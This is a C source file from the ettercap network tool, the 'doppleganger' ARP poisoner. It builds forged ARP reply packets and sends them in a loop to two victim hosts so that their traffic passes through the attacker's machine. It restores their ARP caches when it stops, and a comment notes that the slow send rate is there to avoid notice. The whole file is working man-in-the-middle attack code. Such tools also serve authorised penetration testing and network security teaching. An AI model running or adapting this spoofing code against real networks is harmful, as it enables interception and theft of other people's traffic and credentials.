/*
    ettercap -- doppleganger -- the ARP poisoner

    Copyright (C) 2001  ALoR <alor@thepentagon.com>, NaGA <crwm@freemail.it>

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*/

#include <stdio.h>
#include <sys/time.h>
#include <signal.h>
#include <netpacket/packet.h>
#include <net/if_arp.h>
#include <net/ethernet.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/in.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>

#include "ec_main.h"
#include "ec_inet.h"

#ifdef DEBUG
	#include "ec_debug.h"
#endif


struct ARP_packet
{
	char DestMAC[6];
	char SourceMAC[6];
	unsigned short Protocol_type;
	unsigned short Hardware_type;
	unsigned short Res_protocol;
	char HA_len;
	char PA_len;
	unsigned short Op_code;
	char SourceAdd[6];
	char SourceIP[4];
	char DestAdd[6];
	char DestIP[4];
};

//	global data
struct sockaddr_ll dest;
struct ARP_packet pkarp1;
struct ARP_packet pkarp2;
char PoorMAC1[6];
char PoorMAC2[6];
char PoorIP1[16];
char PoorIP2[16];
int sock;

char MyMAC[6];			// my MAC address

// protos...

void Doppleganger_reARP(int dummy);
int Doppleganger_Run(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2);
int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2);

// ----------------------------

void Doppleganger_reARP(int dummy)			// turns back the ARP cache...
{
	int i;

#ifdef DEBUG
	Debug_msg("Doppleganger_reARP");
#endif

	// legal ARP reply :)
	memcpy(pkarp1.SourceMAC,MyMAC,6);
	memcpy(pkarp1.SourceAdd,PoorMAC2,6);
	*(unsigned int *)pkarp1.SourceIP = inet_addr(PoorIP2);
	memcpy(pkarp1.DestMAC,PoorMAC1,6);
	memcpy(pkarp1.DestAdd,PoorMAC1,6);
	*(unsigned int *)pkarp1.DestIP = inet_addr(PoorIP1);
	pkarp1.Op_code = htons(ARPOP_REPLY);

	memcpy(pkarp2.SourceMAC,MyMAC,6);
	memcpy(pkarp2.SourceAdd,PoorMAC1,6);
	*(unsigned int *)pkarp2.SourceIP = inet_addr(PoorIP1);
	memcpy(pkarp2.DestMAC,PoorMAC2,6);
	memcpy(pkarp2.DestAdd,PoorMAC2,6);
	*(unsigned int *)pkarp2.DestIP = inet_addr(PoorIP2);
	pkarp2.Op_code = htons(ARPOP_REPLY);

	for(i=0; i<5; i++)
	{
		Inet_SendRawPacket(sock, (char *)&pkarp1, sizeof(struct ARP_packet), dest);
		Inet_SendRawPacket(sock, (char *)&pkarp2, sizeof(struct ARP_packet), dest);
		usleep(1000);
	}

	exit(0);
}



int Doppleganger_Main(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
{
	int ifnumber, MTU;

#ifdef DEBUG
	Debug_msg("Doppleganger_Run -- %s %s %s %s", IP1, IP2, MAC1, MAC2);
#endif

	strcpy(program_argv0, "doppleganger");

	Inet_DisableForwarding();

	sscanf(MAC1,"%02X:%02X:%02X:%02X:%02X:%02X",(unsigned	int *)&PoorMAC1[0],
			(unsigned int *)&PoorMAC1[1],(unsigned int *)&PoorMAC1[2],
			(unsigned int *)&PoorMAC1[3],(unsigned int *)&PoorMAC1[4],
			(unsigned int *)&PoorMAC1[5]);
	sscanf(MAC2,"%02X:%02X:%02X:%02X:%02X:%02X",(unsigned	int *)&PoorMAC2[0],
			(unsigned int *)&PoorMAC2[1],(unsigned int *)&PoorMAC2[2],
			(unsigned int *)&PoorMAC2[3],(unsigned int *)&PoorMAC2[4],
			(unsigned int *)&PoorMAC2[5]);

	strncpy(PoorIP1,IP1, 16);
	strncpy(PoorIP2,IP2, 16);


	sock = Inet_GetRawSock(iface, &MTU, &ifnumber, MyMAC);


	// sendto destination  ( ifindex....)
	dest.sll_family	= AF_PACKET;
	dest.sll_protocol	= htons(ETHERTYPE_ARP);
	dest.sll_pkttype	= PACKET_BROADCAST;
	dest.sll_hatype	= htons(ARPHRD_ETHER);
	dest.sll_ifindex	= ifnumber;


	//	frame ethernet header
	pkarp1.Protocol_type = htons(ETHERTYPE_ARP);		// ARP protocol
	pkarp1.Hardware_type = htons(ARPHRD_ETHER);		// Hardware type
	pkarp1.Res_protocol = htons(ETHERTYPE_IP);		// IP address space
	pkarp1.HA_len = 6;	// Ethernet address len
	pkarp1.PA_len = 4;	// IP address len
	memcpy(pkarp1.SourceMAC, MyMAC, 6);
	memcpy(pkarp1.SourceAdd, MyMAC, 6);
	pkarp1.Op_code = htons(ARPOP_REQUEST);

	memcpy(&pkarp2, &pkarp1, sizeof(struct ARP_packet) );

	// fake ARP packets
	*(unsigned int *)pkarp1.SourceIP = inet_addr(PoorIP1);
	memcpy(pkarp1.DestMAC,PoorMAC2,6);
	memcpy(pkarp1.DestAdd,PoorMAC2,6);
	*(unsigned int *)pkarp1.DestIP = inet_addr(PoorIP2);
	pkarp1.Op_code = htons(ARPOP_REPLY);

	*(unsigned int *)pkarp2.SourceIP = inet_addr(PoorIP2);
	memcpy(pkarp2.DestMAC,PoorMAC1,6);
	memcpy(pkarp2.DestAdd,PoorMAC1,6);
	*(unsigned int *)pkarp2.DestIP = inet_addr(PoorIP1);
	pkarp2.Op_code = htons(ARPOP_REPLY);

	signal(SIGINT , Doppleganger_reARP);
	signal(SIGTERM, Doppleganger_reARP);

	// sends the fake replies
	loop
	{
		if (getppid() == 1) Doppleganger_reARP(SIGTERM);

		Inet_SendRawPacket(sock, (char *)&pkarp1, sizeof(struct ARP_packet), dest);
		Inet_SendRawPacket(sock, (char *)&pkarp2, sizeof(struct ARP_packet), dest);

		sleep(2); 	// Evitiamo di dare nell'occhio trasformando l'hub in un albero di Natale ;)
	}

	return(0);

}



int Doppleganger_Run(char *iface, char *IP1, char *IP2, char *MAC1, char *MAC2)
{
	int Dopple_pid;

	if (!(Dopple_pid = fork()))
		Doppleganger_Main(iface, IP1, IP2, MAC1, MAC2);
	else
		return Dopple_pid;

	return 0;
}

